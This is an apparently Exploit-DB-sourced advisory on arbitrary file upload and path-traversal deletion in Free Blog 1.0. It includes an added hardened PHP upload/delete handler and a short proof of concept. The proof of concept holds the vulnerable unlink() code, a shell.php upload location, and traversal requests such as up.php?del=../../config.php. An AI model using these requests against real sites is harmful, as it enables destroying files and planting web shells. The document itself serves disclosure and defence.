Vendor: Free Blog
By: cr4wl3r
CVSS: 8.8 (HIGH)
Title: Arbitrary File Upload and Deletion Vulnerability
CWE: 264
Product Name: Free Blog
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: blog.sdnex.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 12.04.1 LTS
Year: 2013

Free Blog 1.0 Multiple Vulnerability

The Free Blog 1.0 application is vulnerable to arbitrary file upload and deletion. An attacker can upload a malicious file to the server and execute it. The attacker can also delete any file from the server.

Mitigation:

The application should be configured to only allow uploads of specific file types and should also be configured to only allow uploads to specific directories.
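As an added example (this is not code from Free Blog 1.0 or from the advisory), the following is a hardened replacement for an up.php-style upload and delete handler that applies the mitigation above and also closes the deletion path shown in the proof of concept: uploads are restricted to an allowlist of extensions whose content is checked with finfo, stored under a server-chosen random name in one fixed directory, and a delete request is honoured only for a plain file name that canonicalises to a location directly inside that directory. The names UPLOAD_DIR, safe_upload_path(), handle_delete(), handle_upload(), the `image` form field and the `user_id` session key are illustrative assumptions, not identifiers from the real application.

```php
<?php
// Added example, not Free Blog's own code. All function and constant names
// here are assumptions chosen for illustration.
declare(strict_types=1);

// Every upload lives under this one directory. The web server should serve
// it as static content only, with script execution disabled.
const UPLOAD_DIR = __DIR__ . '/log/images';

// Allowlist: permitted extensions and the MIME type each must actually carry.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Return the canonical path of an existing file named $name inside
 * UPLOAD_DIR, or null if $name is not a plain file name or resolves
 * anywhere else (e.g. via "../" or a symlink pointing out of the directory).
 */
function safe_upload_path(string $name): ?string
{
    // Only a simple "name.ext" token is accepted: this rejects separators,
    // "..", absolute paths, null bytes and dot-files before touching disk.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}\z/', $name)) {
        return null;
    }
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . '/' . $name);   // false if the file is missing
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

/**
 * Hardened counterpart of unlink("./log/images/$id"): the parameter is
 * validated and confined to UPLOAD_DIR before anything is removed.
 */
function handle_delete(string $requested): bool
{
    $path = safe_upload_path($requested);
    if ($path === null) {
        http_response_code(400);
        return false;
    }
    return unlink($path);
}

/**
 * Accept one uploaded file only if both its extension and its sniffed MIME
 * type are on the allowlist, then store it under a random server-chosen name
 * so the client never controls the final file name or extension.
 * Returns the stored file name, or null when the upload is rejected.
 */
function handle_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }
    // Check the bytes, not just the name: a PHP script renamed to .png fails here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // readable, never executable
    return $stored;
}

// Dispatch: both actions require a POST (never a bare GET link) and a
// logged-in session. $_SESSION['user_id'] is an assumed session key.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    session_start();
    if (empty($_SESSION['user_id'])) {
        http_response_code(403);
        exit;
    }
    if (isset($_POST['del'])) {
        handle_delete((string) $_POST['del']);
    } elseif (isset($_FILES['image'])) {
        handle_upload($_FILES['image']);
    }
}
```

The two checks in safe_upload_path() are deliberately redundant: the regex rejects traversal syntactically, and the realpath()/dirname() comparison rejects it semantically, so a symlink left inside the upload directory cannot be used to reach a file outside it. Pair this with a web-server rule that disables PHP execution under log/images so that even a file which slips past the allowlist is served as inert bytes rather than run.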
Source (Exploit-DB raw data):

# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

   http://bastardlabs/blog_path/up.php

Shell will be available here

   http://bastardlabs/blog_path/log/images/shell.php



Arbitrary File Deletion Vulnerability

----------
<?php
// up.php, lines 49-54 as reported: the "del" parameter is passed to unlink()
// unvalidated, so "../" sequences escape the ./log/images directory.
if ($_GET['del']) {
    $id = $_GET['del'];
    unlink("./log/images/$id");
}
?>
----------

   http://bastardlabs/blog_path/up.php?del=../../[file]
   http://bastardlabs/blog_path/up.php?del=../../config.php

------------------------------
My sweetheart
http://www.photoshow.com/watch/rx9IX5ZS